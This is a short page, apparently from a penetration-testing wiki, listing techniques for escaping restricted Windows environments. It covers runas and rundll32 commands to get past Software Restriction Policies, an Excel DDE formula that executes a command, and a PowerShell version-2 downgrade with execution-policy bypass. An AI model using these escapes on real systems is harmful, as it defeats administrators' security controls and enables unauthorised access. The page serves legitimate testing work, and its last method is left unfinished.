Environments escape

Penetration Testing Wiki

Escape Citrix or cmd.exe disabled by SRP

runas /savecred /user:$USERNAME calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

I.e.:

rundll32.exe user32.dll,LockWorkStation
start cmd

Escape Excel

Excel command execution through a macro:

=cmd|'/C calc.exe'!__xA1

Escape PowerShell

Powershell evasion inside ConstrainedLanguage mode:

Method 1: Downgrade powershell to v2

powershell.exe -Version 2 -ep bypass -nop

Method 2: runas powershell ?